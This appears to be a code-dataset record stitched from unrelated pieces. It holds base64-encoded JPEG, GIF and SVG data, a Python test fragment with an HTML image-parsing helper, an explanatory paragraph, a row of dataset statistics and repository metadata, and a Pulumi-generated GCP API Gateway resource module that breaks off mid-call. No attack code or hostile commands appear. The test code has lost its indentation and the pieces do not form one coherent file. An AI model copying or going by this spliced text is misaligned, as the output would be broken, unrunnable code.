Xl1uOR4FSrKkvdkPl0aEYpmZthU9NMKp6SVEpzMm4Pb6rvMlCIFQBtcWzznQisaMwa1OWSdLZi/eGFhAWANgLIdPw//8QAJBABAQACAgEDBAMAAAAAAAAAAREAITFBUSAwgRBgYZFxofD/2gAIAQEAAT8Q+4W2FyERkQQRNiY8cOREZiCiOkcbYXIRGRBBE2Jjx4pEAZqKAG1cYC09E2qKD8uXF4L5BADdhIKiym3SJBSqegN3B+HTAFEo38iOKpYjuIITpHUOEFPzixSqwnn4gJm6WBoKgAxsDfs9AfQ4wclEaAAqugMDFcrptIXiA3LyuAL4ByghDB0CzlJD5V+FhsXbtE52KodJTvGK6DIbQADt0fQ0tadG9xSClHPLv2egPoloeSkGCgRUFnThA7j+7hf3hM1Ihu2p2xWDHYEZFcuaD/ChYpuDoBjPQCl0FesA1JzLW8YvFL5z9Q2WJOZ/Dj1gHBASr5QMXSbw8kfAL8enoDrT+YRFHYjMdvFcTVK2PCrgIypAQXA6NQOho6M0/n6cdJGG1gD+TsVEaGlDjfqRBGNbIWMMK44Ux9KhWRGKguAWBeHvPyuUxRKUqq7bgQ+zv//Z'
gif_b64_image = b'R0lGODlhgACAAMZiAAAp/w0t/xYw/xwz/yY5/yo8/y4//zVD/zhG/z1K/0BM/0JO/0VQ/0dS/0tV/1Nb/1Zf/1xj/2Nq/2lv/21z/251/3h9/3p//3yB/36C/4CF/4KH/4SJ/4WK/4mN/4uP/4yQ/42R/4+T/5GU/5KV/5SX/5SY/5WZ/5ib/5mc/52g/5+i/6ir/6mr/66w/7Cy/7Gz/7K0/7O1/7W3/7a4/72+/77A/8DC/8HD/8XH/8nK/8vN/83O/8/Q/9HS/9LT/9XW/9fY/9na/9ra/9rb/9zd/93e/9/g/+Dh/+Hi/+Tl/+jp/+np/+nq/+vr/+3t/+7u/+7v/+/v//Dx//Hx//Hy//T0//X1//b2//f3//f4//j4//n5//r6//v8//z8//39//7+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////yH5BAEKAH8ALAAAAACAAIAAAAf+gGKCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3uu19HNSkWDwgCCRAUJDE8Uu9NWCgAQLCgQYMSXDBB1OVgQS+GGjqcOJHDLisqAlDcSHDDIYkOIRYCyZGixVxDGpTkaOAjRZGESK48ePKWDgEzN7aM+JJnToc1a/nQ+HPizpE9kRY1GHSWkwMbE7D48QQLmCxRjtgwAZXg0ZhJwS4t2FTWBooBZmhRxKVHBwD+XwfJfOgz5DAhFA0QeXQkhMuJMOWGBfaBIo9McwkGFpQYwOJeV3A6/KCp8WPLwn5QNFJ5MGPPvWBMTACmM+C6Bx/zMjFRxCbMSscysIVhIovXoBuvnF2rwsQZiG6snBI7NeqivGn5dkgj+PDiBi+PJZh81oWJLZyXJC7WLvSf1WWVmDhCO0fugk9/zxk+1ouJDMIcEr59vePjdINpnpiEkYyJ6H2mXnfGBWOFZAed4B+A9kk3IDAeUBTEIv85FKAYsBEY3TBBULSAEopUeNCFGabnXTBhZJBXDl8gIqJBJOYGmi9LFLBRBDMUUUUXYGDxhA8aMKhhfkMqVswO0wmMaWKBRd5XDA5JjtggfkYa4wMCURJExZRcGgMFCNMNgAISVDrZpGrDHIECATMN0MENW/514pIbLrMFEDGAMMECBBDggAQXrGCDEFksUqKAc76j6KKMNuroo5BGKumklFZq6aWYZqrpppx26umnoIYq6qiklmrqqaimquqqrLbq6quwxirrrLTWaustgQAAOw=='
svg_b64_image = b'PHN2ZyB3aWR0aD0iMTY2LjM0ODgwMzcxMDkzNzVweCIgaGVpZ2h0PSIxMjIuMDIxMjQwMjM0Mzc1cHgiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMTY2LjgyNTU5ODE0NDUzMTI2IDEzLjk4OTM3OTg4MjgxMjUgMTY2LjM0ODgwMzcxMDkzNzUgMTIyLjAyMTI0MDIzNDM3NSIgc3R5bGU9ImJhY2tncm91bmQ6IHJnYmEoMCwgMCwgMCwgMCk7IiBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSJ4TWlkWU1pZCI+PGRlZnM+PGZpbHRlciBpZD0iZWRpdGluZy1ob2xlIiB4PSItMTAwJSIgeT0iLTEwMCUiIHdpZHRoPSIzMDAlIiBoZWlnaHQ9IjMwMCUiPjxmZUZsb29kIGZsb29kLWNvbG9yPSIjMDAwIiByZXN1bHQ9ImJsYWNrIj48L2ZlRmxvb2Q+PGZlTW9ycGhvbG9neSBvcGVyYXRvcj0iZGlsYXRlIiByYWRpdXM9IjIiIGluPSJTb3VyY2VHcmFwaGljIiByZXN1bHQ9ImVyb2RlIj48L2ZlTW9ycGhvbG9neT48ZmVHYXVzc2lhbkJsdXIgaW49ImVyb2RlIiBzdGREZXZpYXRpb249IjQiIHJlc3VsdD0iYmx1ciI+PC9mZUdhdXNzaWFuQmx1cj48ZmVPZmZzZXQgaW49ImJsdXIiIGR4PSIyIiBkeT0iMiIgcmVzdWx0PSJvZmZzZXQiPjwvZmVPZmZzZXQ+PGZlQ29tcG9zaXRlIG9wZXJhdG9yPSJhdG9wIiBpbj0ib2Zmc2V0IiBpbjI9ImJsYWNrIiByZXN1bHQ9Im1lcmdlIj48L2ZlQ29tcG9zaXRlPjxmZUNvbXBvc2l0ZSBvcGVyYXRvcj0iaW4iIGluPSJtZXJnZSIgaW4yPSJTb3VyY2VHcmFwaGljIiByZXN1bHQ9ImlubmVyLXNoYWRvdyI+PC9mZUNvbXBvc2l0ZT48L2ZpbHRlcj48L2RlZnM+PGcgZmlsdGVyPSJ1cmwoI2VkaXRpbmctaG9sZSkiPjxnIHRyYW5zZm9ybT0idHJhbnNsYXRlKDE5Ny40MDIxOTA2ODUyNzIyMiwgOTguMzUyMTg2MjAzMDAyOTMpIj48cGF0aCBkPSJNMjAuMjItMjIuNDZMMjAuMjItMjIuNDZMMjAuMjItMjIuNDZRMjEuMTItMjQuODMgMjEuMTItMjYuODhMMjEuMTItMjYuODhMMjEuMTItMjYuODhRMjEuMTItMzAuNjYgMTguMDUtMzAuNjZMMTguMDUtMzAuNjZMMTguMDUtMzAuNjZRMTYuNDUtMzAuNjYgMTUuMTQtMjkuMjJMMTUuMTQtMjkuMjJMMTUuMTQtMjkuMjJRMTMuODItMjcuNzggMTMuODItMjUuOThMMTMuODItMjUuOThMMTMuODItMjUuOThRMTMuODItMjQuNzAgMTQuODUtMjMuNjhMMTQuODUtMjMuNjhMMTQuODUtMjMuNjhRMTYuMzItMjIuMjcgMjAuMTAtMTkuOTdMMjAuMTAtMTkuOTdMMjAuMTAtMTkuOTdRMjMuODctMTcuNjYgMjUuMzEtMTUuNzhMMjUuMzEtMTUuNzhMMjUuMzEtMTUuNzhRMjYuNzUtMTMuODkgMjYuNzUtMTEuMzBMMjYuNzUtMTEuMzBMMjYuNzUtMTEuMzBRMjYuNzUtOC43MCAyNS41MC02LjM0TDI1LjUwLTYuMzRMMjUuNTAtNi4zNFEyNC4yNi0zLjk3IDIyLjAyLTIuMzBMMjIuMDItMi4zMEwyMi4wMi0yLjMwUTE3LjIyIDEuMjggOS41NCAxLjI4TDkuNTQgMS4yOEw5LjU0IDEuMjhRNS4zOCAxLjI4IDIuMTgtMC45MEwyLjE4LTAuOTBMMi4xOC
0wLjkwUS0xLjAyLTMuMDEtMS4wMi01LjUwTC0xLjAyLTUuNTBMLTEuMDItNS41MFEtMS4wMi04IDAuODAtOS40N0wwLjgwLTkuNDdMMC44MC05LjQ3UTIuNjItMTAuOTQgNS4zMS0xMC45NEw1LjMxLTEwLjk0TDUuMzEtMTAuOTRROC0xMC45NCA5LjY2LTkuOTJMOS42Ni05LjkyTDkuNjYtOS45MlE4LjgzLTcuODEgOC44My02LjQwTDguODMtNi40MEw4LjgzLTYuNDBROC44My0yLjE4IDEyLjQyLTIuMThMMTIuNDItMi4xOEwxMi40Mi0yLjE4UTEzLjk1LTIuMTggMTQuOTgtMy4xNEwxNC45OC0zLjE0TDE0Ljk4LTMuMTRRMTYtNC4xMCAxNi01Ljc2TDE2LTUuNzZMMTYtNS43NlExNi05LjAyIDEwLjUwLTEyLjQ4TDEwLjUwLTEyLjQ4TDEwLjUwLTEyLjQ4UTYuMDItMTUuNDIgNC45OS0xNi41OEw0Ljk5LTE2LjU4TDQuOTktMTYuNThRMy4yNi0xOC42MiAzLjI2LTIxLjE4TDMuMjYtMjEuMThMMy4yNi0yMS4xOFEzLjI2LTIzLjc0IDQuNDgtMjYuMThMNC40OC0yNi4xOEw0LjQ4LTI2LjE4UTUuNzAtMjguNjEgNy45NC0zMC4zNEw3Ljk0LTMwLjM0TDcuOTQtMzAuMzRRMTIuNjEtMzMuOTIgMjAuNzQtMzMuOTJMMjAuNzQtMzMuOTJMMjAuNzQtMzMuOTJRMjQuOTAtMzMuOTIgMjcuMzYtMzIuMjZMMjcuMzYtMzIuMjZMMjcuMzYtMzIuMjZRMjkuODItMzAuNTkgMjkuODItMjcuNzhMMjkuODItMjcuNzhMMjkuODItMjcuNzhRMjkuODItMjQuOTYgMjguMTMtMjMuMzZMMjguMTMtMjMuMzZMMjguMTMtMjMuMzZRMjYuNDMtMjEuNzYgMjMuMzYtMjEuNzZMMjMuMzYtMjEuNzZMMjMuMzYtMjEuNzZRMjEuMjUtMjEuNzYgMjAuMjItMjIuNDZaTTU1LjQyLTMxLjU1TDU1LjQyLTMxLjU1TDU1LjQyLTMxLjU1UTU3LjU0LTMzLjkyIDYxLjE4LTMzLjkyTDYxLjE4LTMzLjkyTDYxLjE4LTMzLjkyUTYzLjQyLTMzLjkyIDY1LjE1LTMyLjcwTDY1LjE1LTMyLjcwTDY1LjE1LTMyLjcwUTY2Ljg4LTMxLjQ5IDY2Ljg4LTI5LjIyTDY2Ljg4LTI5LjIyTDY2Ljg4LTI5LjIyUTY2Ljg4LTI2Ljk0IDY2LjE4LTI0LjUxTDY2LjE4LTI0LjUxTDY2LjE4LTI0LjUxUTY1LjQ3LTIyLjA4IDY0LjM4LTE5LjU4TDY0LjM4LTE5LjU4TDY0LjM4LTE5LjU4UTYyLjIxLTE0LjcyIDU5LjIwLTEwLjY5TDU5LjIwLTEwLjY5TDU5LjIwLTEwLjY5UTU0Ljk4LTQuODYgNTAuOTEtMS43OUw1MC45MS0xLjc5TDUwLjkxLTEuNzlRNDYuODUgMS4yOCA0Mi40MyAxLjI4TDQyLjQzIDEuMjhMNDIuNDMgMS4yOFEzOC44NSAxLjI4IDM2LjY3IDAuNDVMMzYuNjcgMC40NUwzNi42NyAwLjQ1UTM2LjI5LTEyLjk5IDM1LjgxLTE3Ljc5TDM1LjgxLTE3Ljc5TDM1LjgxLTE3Ljc5UTM1LjMzLTIyLjU5IDM0Ljk0LTI1LjIyTDM0Ljk0LTI1LjIyTDM0Ljk0LTI1LjIyUTM0LjMwLTMwLjM0IDMyLjM4LTMxLjU1TDMyLjM4LTMxLjU1TDMyLjM4LTMxLjU1UTMzLjg2LTMyLjgzIDM1LjMwLTMzLjM4TDM1LjMwLTMzLjM4TDM1LjMwLTMzLjM4UTM2Ljc0LTMzLjkyIDM5LjcxLTMzLjkyTDM5LjcxLTMzLjkyTDM5Lj
cxLTMzLjkyUTQyLjY5LTMzLjkyIDQ0LjgwLTMxLjU4TDQ0LjgwLTMxLjU4TDQ0LjgwLTMxLjU4UTQ2LjkxLTI5LjI1IDQ3LjMzLTI1LjEyTDQ3LjMzLTI1LjEyTDQ3LjMzLTI1LjEyUTQ3Ljc0LTIwLjk5IDQ3Ljc0LTE2TDQ3Ljc0LTE2TDQ3Ljc0LTE2UTQ3Ljc0LTExLjAxIDQ3LjM2LTQuOTlMNDcuMzYtNC45OUw0Ny4zNi00Ljk5UTQ5LjM0LTYuNDAgNTEuNDYtMTAuNjlMNTEuNDYtMTAuNjlMNTEuNDYtMTAuNjlRNTQuMzQtMTYuNjQgNTUuMzYtMjMuODFMNTUuMzYtMjMuODFMNTUuMzYtMjMuODFRNTUuNjgtMjUuOTggNTUuNjgtMjguMjlMNTUuNjgtMjguMjlMNTUuNjgtMjguMjlRNTUuNjgtMzAuNTkgNTUuNDItMzEuNTVaTTczLjE1LTI2Ljc1TDczLjE1LTI2Ljc1TDczLjE1LTI2Ljc1UTc1LjMzLTI5LjgyIDc4LjYyLTMxLjg3TDc4LjYyLTMxLjg3TDc4LjYyLTMxLjg3UTgxLjkyLTMzLjkyIDg1Ljk1LTMzLjkyTDg1Ljk1LTMzLjkyTDg1Ljk1LTMzLjkyUTg5Ljk4LTMzLjkyIDkxLjkwLTMyLjY0TDkxLjkwLTMyLjY0TDEwNC40NS0zMy45MkwxMDAuMTAtOS4zNEwxMDAuMTAtOS4zNFE5Ny44NiAzLjIwIDkzLjEyIDguMTNMOTMuMTIgOC4xM0w5My4xMiA4LjEzUTg4LjU4IDEyLjgwIDc5Ljc0IDEyLjgwTDc5Ljc0IDEyLjgwTDc5Ljc0IDEyLjgwUTczLjAyIDEyLjgwIDY5LjE4IDEwLjY5TDY5LjE4IDEwLjY5TDY5LjE4IDEwLjY5UTY1LjM0IDguNTggNjUuMzQgNS4wNkw2NS4zNCA1LjA2TDY1LjM0IDUuMDZRNjUuMzQgMi40MyA2Ny4zMyAwLjkzTDY3LjMzIDAuOTNMNjcuMzMgMC45M1E2OS4zMS0wLjU4IDcyLjM4LTAuNThMNzIuMzgtMC41OEw3Mi4zOC0wLjU4UTc1LjA3LTAuNTggNzcuMTIgMC42NEw3Ny4xMiAwLjY0TDc3LjEyIDAuNjRRNzguMzQgMS4yOCA3OC45MSAyLjE4TDc4LjkxIDIuMThMNzguOTEgMi4xOFE3Ny40NCAzLjQ2IDc3LjQ0IDUuNTdMNzcuNDQgNS41N0w3Ny40NCA1LjU3UTc3LjQ0IDguMzIgODAuMDAgOC4zMkw4MC4wMCA4LjMyTDgwLjAwIDguMzJRODQuMjkgOC4zMiA4Ni43Mi0xLjc5TDg2LjcyLTEuNzlMODYuNzItMS43OVE4Ny40Mi00LjU0IDg4LjAwLTcuMzBMODguMDAtNy4zMEw4OC4wMC03LjMwUTg1LjEyLTMuNzggNzguNTktMy43OEw3OC41OS0zLjc4TDc4LjU5LTMuNzhRNzQuMDUtMy43OCA3MS40Mi01Ljk1TDcxLjQyLTUuOTVMNzEuNDItNS45NVE2OC44MC04LjEzIDY4LjgwLTEzLjI1TDY4LjgwLTEzLjI1TDY4LjgwLTEzLjI1UTY4LjgwLTE2LjQ1IDY5Ljg5LTIwLjA2TDY5Ljg5LTIwLjA2TDY5Ljg5LTIwLjA2UTcwLjk4LTIzLjY4IDczLjE1LTI2Ljc1Wk04MS40Ny0xMy4wNkw4MS40Ny0xMy4wNkw4MS40Ny0xMy4wNlE4MS40Ny04LjcwIDgzLjcxLTguNzBMODMuNzEtOC43MEw4My43MS04LjcwUTg1LjI1LTguNzAgODYuNzItMTAuMzdMODYuNzItMTAuMzdMODYuNzItMTAuMzdRODcuODctMTEuNzEgODguMzItMTMuNzBMODguMzItMTMuNzBMOTEuNTgtMzAuMTRMOTEuNTgtMzAuMTRROTEuMjYtMz
AuMjEgOTAuOTQtMzAuMzRMOTAuOTQtMzAuMzRMOTAuOTQtMzAuMzRROTAuMzAtMzAuNTkgODkuNDctMzAuNTlMODkuNDctMzAuNTlMODkuNDctMzAuNTlRODUuNTctMzAuNTkgODMuMjYtMjQuMTlMODMuMjYtMjQuMTlMODMuMjYtMjQuMTlRODEuNDctMTkuMjAgODEuNDctMTMuMDZaIiBmaWxsPSIjY2NjIj48L3BhdGg+PC9nPjwvZz48c3R5bGU+dGV4dCB7CiAgZm9udC1zaXplOiA2NHB4OwogIGZvbnQtZmFtaWx5OiBBcmlhbCBCbGFjazsKICBkb21pbmFudC1iYXNlbGluZTogY2VudHJhbDsKICB0ZXh0LWFuY2hvcjogbWlkZGxlOwp9PC9zdHlsZT48L3N2Zz4='
def setup_method(self, method):
self.temp_dir = tempfile.mkdtemp()
def teardown_method(self, method):
if os.path.exists(self.temp_dir) and self.temp_dir != '/tmp':
rmtree(self.temp_dir)
self.temp_dir = '/tmp'
def build_zpt(self):
zptfile = Path(self.temp_dir) / 'test.zpt'
result = ReportFileBuilder.build_file(RPT_FILTER_EXAMPLE_PATH, zptfile)
assert result.success() is True
zpt = ReportFileLoader.load_file(zptfile)
assert zpt is not None
return zpt
class ImageParser(HTMLParser):
def reset(self):
super().reset()
self._images = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
self._images.append(attrs)
def get_images(self) -> list:
result = []
for img in self._images:
data = {}
for attr in img:
data[attr[0]] = attr[1]
result.append(data)
return result
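`ImageParser` collects the attributes of every `<img>` tag it encounters; `handle_starttag` receives attributes as `(name, value)` tuples, which `get_images` folds into dicts. A standalone copy of the helper (re-declared here so it runs on its own) and a usage sketch:

```python
from html.parser import HTMLParser

class ImageParser(HTMLParser):
    """Standalone copy of the helper above, for illustration."""
    def reset(self):
        super().reset()
        self._images = []

    def handle_starttag(self, tag, attrs):
        if tag == 'img':
            self._images.append(attrs)

    def get_images(self) -> list:
        # attrs arrive as (name, value) tuples; fold each tag into a dict
        return [dict(img) for img in self._images]

parser = ImageParser()
parser.feed('<p><img src="a.png" alt="logo"><img src="b.jpg"></p>')
images = parser.get_images()
# images == [{'src': 'a.png', 'alt': 'logo'}, {'src': 'b.jpg'}]
```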
| 291.418182 | 6,431 | 0.937609 | 492 | 16,028 | 30.481707 | 0.78252 | 0.003267 | 0.004401 | 0.002667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110706 | 0.024457 | 16,028 | 54 | 6,432 | 296.814815 | 0.848427 | 0.002308 | 0 | 0 | 0 | 0.073171 | 0.915317 | 0.913878 | 0 | 1 | 0 | 0 | 0.04878 | 1 | 0.146341 | false | 0 | 0.170732 | 0 | 0.536585 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
7ae5bda6078cdf279fd1b6d2b0b681ac2cee1df3 | 19,767 | py | Python | sdk/python/pulumi_gcp/apigateway/api.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/apigateway/api.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/apigateway/api.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ApiArgs', 'Api']
@pulumi.input_type
class ApiArgs:
def __init__(__self__, *,
api_id: pulumi.Input[str],
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Api resource.
:param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within scope of the parent resource(project)
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
:param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "api_id", api_id)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if managed_service is not None:
pulumi.set(__self__, "managed_service", managed_service)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="apiId")
def api_id(self) -> pulumi.Input[str]:
"""
        Identifier to assign to the API. Must be unique within the scope of the parent resource (project)
"""
return pulumi.get(self, "api_id")
@api_id.setter
def api_id(self, value: pulumi.Input[str]):
pulumi.set(self, "api_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-visible name for the API.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource labels to represent user-provided metadata.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="managedService")
def managed_service(self) -> Optional[pulumi.Input[str]]:
"""
        Immutable. The name of a Google Managed Service (https://cloud.google.com/service-infrastructure/docs/glossary#managed).
        If not specified, a new Service will automatically be created in the same project as this API.
"""
return pulumi.get(self, "managed_service")
@managed_service.setter
def managed_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_service", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _ApiState:
def __init__(__self__, *,
api_id: Optional[pulumi.Input[str]] = None,
create_time: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Api resources.
        :param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within the scope of the parent resource (project)
:param pulumi.Input[str] create_time: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
        :param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service (https://cloud.google.com/service-infrastructure/docs/glossary#managed).
               If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] name: The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if api_id is not None:
pulumi.set(__self__, "api_id", api_id)
if create_time is not None:
pulumi.set(__self__, "create_time", create_time)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if managed_service is not None:
pulumi.set(__self__, "managed_service", managed_service)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="apiId")
def api_id(self) -> Optional[pulumi.Input[str]]:
"""
        Identifier to assign to the API. Must be unique within the scope of the parent resource (project)
"""
return pulumi.get(self, "api_id")
@api_id.setter
def api_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_id", value)
@property
@pulumi.getter(name="createTime")
def create_time(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "create_time")
@create_time.setter
def create_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_time", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-visible name for the API.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource labels to represent user-provided metadata.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="managedService")
def managed_service(self) -> Optional[pulumi.Input[str]]:
"""
        Immutable. The name of a Google Managed Service (https://cloud.google.com/service-infrastructure/docs/glossary#managed).
        If not specified, a new Service will automatically be created in the same project as this API.
"""
return pulumi.get(self, "managed_service")
@managed_service.setter
def managed_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_service", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class Api(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A consumable API that can be used by multiple Gateways.
To get more information about Api, see:
* [API documentation](https://cloud.google.com/api-gateway/docs/reference/rest/v1beta/projects.locations.apis)
* How-to Guides
* [Official Documentation](https://cloud.google.com/api-gateway/docs/quickstart)
## Example Usage
### Apigateway Api Basic
```python
import pulumi
import pulumi_gcp as gcp
api = gcp.apigateway.Api("api", api_id="api",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
Api can be imported using any of these accepted formats
```sh
$ pulumi import gcp:apigateway/api:Api default projects/{{project}}/locations/global/apis/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{project}}/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{api_id}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within the scope of the parent resource (project)
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
        :param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service (https://cloud.google.com/service-infrastructure/docs/glossary#managed).
               If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A consumable API that can be used by multiple Gateways.
To get more information about Api, see:
* [API documentation](https://cloud.google.com/api-gateway/docs/reference/rest/v1beta/projects.locations.apis)
* How-to Guides
* [Official Documentation](https://cloud.google.com/api-gateway/docs/quickstart)
## Example Usage
### Apigateway Api Basic
```python
import pulumi
import pulumi_gcp as gcp
api = gcp.apigateway.Api("api", api_id="api",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
Api can be imported using any of these accepted formats
```sh
$ pulumi import gcp:apigateway/api:Api default projects/{{project}}/locations/global/apis/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{project}}/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{api_id}}
```
:param str resource_name: The name of the resource.
:param ApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiArgs.__new__(ApiArgs)
if api_id is None and not opts.urn:
raise TypeError("Missing required property 'api_id'")
__props__.__dict__["api_id"] = api_id
__props__.__dict__["display_name"] = display_name
__props__.__dict__["labels"] = labels
__props__.__dict__["managed_service"] = managed_service
__props__.__dict__["project"] = project
__props__.__dict__["create_time"] = None
__props__.__dict__["name"] = None
super(Api, __self__).__init__(
